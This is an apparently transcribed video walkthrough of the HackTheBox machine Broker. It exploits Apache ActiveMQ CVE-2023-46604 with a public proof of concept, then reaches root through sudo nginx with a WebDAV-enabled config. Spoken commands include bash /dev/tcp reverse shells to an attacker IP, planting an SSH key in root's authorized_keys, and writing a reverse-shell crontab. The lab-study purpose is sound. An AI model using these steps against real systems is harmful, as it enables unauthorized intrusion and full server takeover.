What's going on YouTube? This is Ipsec. I'm doing Broker from HackTheBox, which is going straight to retired, which is awesome because that means we can talk about this box right away. And the foothold of the box was in the news a lot lately because it is the Apache ActiveMQ exploit. The CVE was published on October 27th, 2023, and it's an unauthenticated exploit against ActiveMQ, but Huntress Labs has discovered exploitation as early as October 10th. So this is something that was being exploited in the wild. And if you don't know what ActiveMQ is, it's just a message broker similar to RabbitMQ or Kafka. So it gets bundled with a lot of software. And while some instances were listening on the internet, it's also very common to find on internal networks. I still exploit CVE 2016 from ActiveMQ from time to time. So it's going to be around for a long time on the inside of a network. Once you exploit this vulnerability, you have the ability to run nginx as sudo or as root, and you can make a malicious config and get code execution that way. So with that being said, let's just jump in. As always, we're going to start off with an nmap. So -sc for default scripts, sv enumerate versions, oa output all formats, put in the nmap directory and call it broker, then the IP address of 10.10.11.243. This can take some time to run, so I've already ran it. Looking at the results, we have just two ports open, the first one being SSH on port 22, and its banner tells us it's an Ubuntu server. We also have HTTP listening on port 80. It is nginx also running on Ubuntu, and we have the server asking us for authorization, and it says it's part of the ActiveMQ realm. So I'm guessing ActiveMQ is installed on this box. Let's go to 10.10.11.243, and we get the login prompt. We can try default credentials like admin, and surprisingly, we get in. We don't actually need these credentials because there is a newer exploit of ActiveMQ. My very first thought was going to an old exploit of ActiveMQ, which is from like 2016. It was part of the file server exploit of ActiveMQ, and it's in Metasploit. It's the best way to run it. So I'll do sudo msfdb run, and that's going to start up Metasploit. And I think the newest ActiveMQ exploit is also in Metasploit. I just haven't updated this in a while, and we'll be doing it with probably a Golang or Python script instead of using Metasploit. Not sure exactly why I decided to do that, but that's the route we're going. So we'll do a search for ActiveMQ, and we see we have one exploit. So we'll use 0 to go to this. And this is the one I was talking about before. So it's going to exploit the file upload service, or file server manager, I think what it's called. So let's do set lhost to ton0. Let's do, I think it's our host. Yep, we have to set our host. And you can see the default credentials here is admin. We can set our host to 10.10.11.243. Click run, and it's going to try to upload the file and fails. So how this exploit works is the file server of ActiveMQ had a DAV server that allowed you to put files onto it, and it only lets you put files into the directory of the file server. But you could also issue a move command and move them outside of the file server, put like a JSP file in the root, and then go to the JSP and execute it. Kind of like PHP exploits, right? You just put the PHP file on and be able to exploit it. We could try setting our port to 80, but that's not really going to get us anything either. But the one thing is, this box was listening on 8161. We just didn't see it in nmap, and that's because we only scanned the top 1,000 ports. So let's do a full nmap scan. So I'm going to do sudo nmap -p- to do all ports. I'm going to say --min -rate equals 10,000. And I normally don't like running it this fast because it can miss things, but it's generally reliable in HackTheBox. I'm also going to do -og for output greppable, and then 10.10.11.243. And we also have to say broker all ports. So we gave it a file name for the greppable format. So this is only going to take probably about 10 seconds, and then we're going to go through the ports that come back and do a second nmap scan with the scripts. The reason why I don't add the scripts here is it will make the scan take so much longer. It's much quicker just do it this way. So let's do a grep-op because this is going to be overpowered. And then I'm going to say I want digits. and anything that ends in /open. I probably should show you the output first. So if we just look at broker all ports, this is how it is. So we're just doing a grep to look for this, right? There's probably going to be some that may say like /closed. So that's why I add the /open to this. And then I don't know. Let's see. Is it because I put the open in? I'm not exactly sure why grep is showing me everything. There's probably a better syntax to do, but I just don't remember the flags because I can remember OP. So I'm just going to pipe that over to awk, and we'll do -F for field separator on /, print the first one. And now we just have a list of ports. So the next thing we want to do is remove the line break. So I'll use the tr command, say line break, separate that with, replace that with a comma. And now we have a list of just the ports. So we can do our sudo nmap-sc for default scripts, sv, enumerate version, oa, output all formats, put in the nmap directory and call it broker. And then the -p for ports, paste in the ports, and the IP address of 10.10.11.243. So this can take some time to run. So while it runs, let's just go and search for ActiveMQ exploit and see what we have. So there is a new one, CVE 2023-46604, and I'm trying to find the best post I liked. It was on Attacker KB, I think. But all these will get you to a good spot. Here we go. This one just has some layer analysis. And is this not the post I was thinking of? Description. See, technical analysis. This is not the post I was thinking of. Let's see. Maybe we just say the CVE. This is the downside with doing video sometimes. Google doesn't return what you think it will. Site attackerkb.com. That CVE. Is this going to be it? Okay, so I'm going to pause the video so I can get to the exact post I wanted to see. Okay, I found it. So all I did was search straight for the CVE, and then when we scroll down, there's going to be a Reddit posting right here. And this came out 7 days ago, right around the time the exploit came out. And it was first being weaponized by a ransomware group. I want to say like Hello Kitty, right? But there is a Attacker KB article here. And if we go to it, we have some technical analysis. Maybe, yeah, this definitely is not the blog post we saw before. And they have a lot of good links here to read if you want to read more about it. There is a POC here. We're not exactly going to use this one. We're going to use one that's a little bit easier to use. So we'll search Google right after this article. But it's talking about it, and they found 7,200 instances of ActiveMQ listening on the internet, with about half of them vulnerable to this CVE. Now, if you don't know what ActiveMQ, it's a message broker, so think of it like RabbitMQ or Kafka, and it's very popular with Java applications because, well, ActiveMQ is written in Java. So it talks a lot about how to get this exploited. I think it's a deserialization exploit, and the most common way to exploit it is going to be down here where they're saying, let's see. So right here, we're sending a packet to ActiveMQ OpenWire, which is 61616. And we'll have to make sure that port is open. We send it with the exception response. And eventually that lets us change what is getting loaded, right? And I think that's where at the top it said the patch, make sure, let's see. Yeah, the patch will make sure the thing is created by the throwable object, which I think is like an exception handler in Java. I don't know exactly. I really distance myself from Java, but anyways, long way to say, eventually we can reach the Spring framework, which ActiveMQ I think is built on, or at least this OpenWire protocol. And then I think it's instantiating with a different config and then pointing the config at a URL, which is going to be our box. And that where we can say run a command. So knowing that, let's make sure 61616 is open. So let's go back to our nmap that we reran, and we're going to have a lot more information, right? So we have the MQTT. I'm guessing this is a transport port. AMQP 8161. This is running Jetty. 44509, 61613, 61614. And I think this last one was 61616, which is the OpenWire transport. So this will allow us potentially to exploit it if it is vulnerable. Based upon logging into the box, we saw it was a 2020 copyright. So chances are this is vulnerable if the CVE came out in 2023. So I'm going to Google ActiveMQ exploit GitHub, and let's see if we can find one that has a README in a language that we can actually understand. So if we go to the top result, it looks like it is. It builds upon, I think this is the one we showed before, and it's just going to use Metasploit to get a reverse shell. So let's go ahead and clone this. And then we're going to take a look at the exploit, see exactly how it works, and see if we want to make any modifications, because I really don't feel like making a Metasploit reverse shell. So I'm just going to do code dot to open this up in VS Code, and we'll go over what is here. So main.go. We're going to have a few flags. So this is going to be arguments we can run. So I is going to be the ActiveMQ server, the port. It's going to default to 61616, and then Spring XML URL. This is going to be probably pointed back at our server. And this doesn't exactly make sense. I think this is just reaching the deserialization thing. We're passing in the class. This class is going to get called with our message, which is our arguments, I believe. So let's look at POC Linux. And we see it's doing a constructor, a list. We're going to execute sh with -c, and then it's just going to curl an elf and then execute it. Let's change this up. Let's do bash. And since we're already going to be in a bash-c, we don't have to prefix our command with it. So we can just try, let's see, bash-i, dev tcp 10.10.14.8, 9001, 0 and 1, like that. Let me make sure I am that IP. I am. So this should get us a reverse shell. So let's stand up our web server. So we can say Python 3-m HTTP server. And then we execute this. So go in here. We can say go run main.go. And then we want to specify -i. This is going to be 10.10.11.243. -p 61616 -u. We'll say HTTP 10.10.11 or 10.10.14.8 port 8000. And then it was like Linux POC or something. POC-linux.xml. And let's stand up NC on port 9001 so we catch the shell when it comes. And we sent the packet. It hit our server, but we did not get a shell. Let's see, POC-linux.xml, bash-c, bash-i, dev tcp. I wonder if like it doesn't like these redirectors. We should also maybe entity encode this. So I'm going to copy this. And let's see, does the decoder have something to help us encode as? I don't think so. No. I wonder if it would work as hex. If we paste this. Let's see. vPOC Linux. I don't think this will work, but it's worth a shot. Hits a server, nothing. Okay. So let's see. HTML Entity Encode online. --i dev TCP 10.10.14.8 9001 0 and 1. That is not what I was expecting. I was like expecting a GT and less than. Let's try this. No. That's what I was expecting. So this may be in hex. That's interesting. I did not know you could encode that way. Let's try them both. Delete all this value. Paste it in. Run this. And there we go. We get a shell. So it would probably work either way. I just did not know HTML Entity Encoding also could look like this. I think it's just and pound X and then hex. But I normally am used to seeing it like this. But now that we have a shell, let's get a proper PTY. So Python 3 -c import PTY spawn bin bash. Then stty raw minus echo foreground. And then export term is equal to xterm. And now we can clear the screen. So we are the ActiveMQ user. We can check if we can run sudo. And it looks like we can run sudo as root and execute the nginx binary, which will essentially be a web server, right? If we go to etc nginx, we can cat default or nginx.conf. And this is going to be a example configuration that we'll use. I'm just going to grep out every comment. And then let's show only lines. So this is a nginx config. It's going to do user www data, and then we have HTTP, and it's going to eventually load things out of, let's see. I guess one of the modules loads things out of sites enabled. Oh no, here it is, sites enabled. So what we can do is just change this user to root. So with the sudo access on this, we can just modify this. So I'm going to copy nginx to dev shm. We can go in there. And then let's v nginx to conf. I probably should redo that grep to n. Let's move n to nginx.conf. Now when we view it, we have no comments. So let's change www data to root. We don't need the PID. I guess I can change the PID to nginx2. I think that's just to prevent nginx from running twice, right? We have 768 workers. That's fine. I don't know exactly what send file is. Let's see. I think we can delete most of this. Access log, error log. Let's not have logs. And we could include... We'll do dev shm. Or, let's see. Cat etc nginx sites enabled default. Yeah, we can just copy this. Okay. So instead of proxy pass, we don't want to forward it there. Let's just do root /. So this should stand up a web server on, let's do 1337. I don't think we need a server name. That's for like virtual host routing. So we definitely probably don't need that. Let's say nginx-t to test our config. I thought it was -t. Test configuration and exit. Good to give it a full path. That is bizarre. Sudo nginx on the config. Is it -c? Server directive is not allowed here. Line 8. So I think server goes in HTTP. .13. Not expecting that. Forgot a semicolon. There we go. So now we have nginx running. We put it on port 1337. So if I do a curl localhost 1337, we have forbidden. That is not what I expected. What did we screw up? Users root. Okay, we're still listening on it. Let's look at a config. Oh, I forgot the auto index. I deleted that. So if I curl localhost 1337, we get we're forbidden because we're telling it, or we didn't tell nginx to create a index file for us, right? But if we did etc past wd, it also works if we specify the file, is what I should say. So if we do /root, root.txt, we can get the root flag, but we want to get a shell on this box, right? So let's first, let's see, we can fix the auto index thing so I can show you. So let's do auto index on. There we go. We'll probably have to change the port, and then we can do sudo nginx-c. Specify the full path. Forgot the semicolon. There we go. So now if I curl localhost 1338, we have this. Now, how can we get a shell in the box? Well, remember when I was talking about the 2016 exploit of ActiveMQ that just had a vulnerable WebDav server? Why don't we make this a vulnerable WebDav server and use curl to put files, right? So we can do auto index on, and then dav methods, and we can enable the put. So that's going to enable the module. I bet there's a WebDav module and etc nginx modules enabled. ls etc nginx modules enabled grep dev. I thought it was. Maybe it's just built into nginx. We forgot to change the port anyways. So let's change away from 1338 and use 9001 because we can. And my shell has died. There we go. I'm not sure exactly what happened. Let's view this and oh god. Let's delete that line. Listen 9001. Hopefully that worked. Let's see. nginx-c. That looks fine. Curl localhost 9001. Awesome. So now we can use put. So let's Google curl put file. And I think there's like a -- upload file command, right? Let's see. Yeah, curl -- upload file. I don't even think we have to specify put. Let's do, let's try /test. Let's make a file real quick. See, I'm on the box itself. Let's not do uploaded file because we're on curl wait, 10, 10, 14, or 11, 243, 9001. Okay. So let's just put a file from our box. So let's do /poc-linux.xml and then do -- upload file poc-linux.xml. And if we go to /, we can see the file does exist. So we can just upload an SSH key at this point. So let's do SSH keygen -f. I'm going to call it broker. And then we can say /root /.sh /authorized keys and give it the file broker.pub. And now sh-i broker root at 10, 10, 11, 243. Accept the key. And we get into the box. And that is pretty much it. If you want to see exactly what this curl command looks like, of course, we could always send this to the proxy. So let's see. Is it -X for a proxy? Let's try HTTP localhost 8080. Are we listening? Maybe lowercase x. There we go. So all a put is we put the put in the HTTP verb, give it the file name, and then where the data is, we put the key, right? And let's say we didn't have that SSH directory. We could have probably enabled move, made a directory on the box and moved it. There's probably a WebDav method to create a directory, but we could also just create a cron tab, right? So what I'm going to try is creating the cron. So let's do cron 1, 2, 3, 4, 5. So that's what, minute, hour, day, month, day of week or something for exactly how cron works. V etc cron tab, because that will tell me. Minute, hour, day of month, month, day of week. Yep. So mostly correct. Okay. And then we can do /c /i dev TCP 10, 10, 14, 8, 9001, 0, and 1 like that. And then let's upload the cron. So first I'm going to listen on 9001 here again. And we can do the curl uploaded file. And let's do cron. And we can specify var spool. Is it cron tabs? ls var spool cron tabs root. That should be it. So we have created that. Do a date. It's probably going to run in 50 seconds. So let's do a sleep for 30, and I'll resume the video when the sleep is done. The sleep is done, so this is going to be the moment of truth. We have about 5 seconds left. 4, 3, 2, 1. Hopefully a cron fires. It does, and we get a shell. So that would be another way we could do it. There's a lot of ways to get code execution once you have file write on Linux. But hope you guys enjoyed the video. Take care, and I want to see you all next time.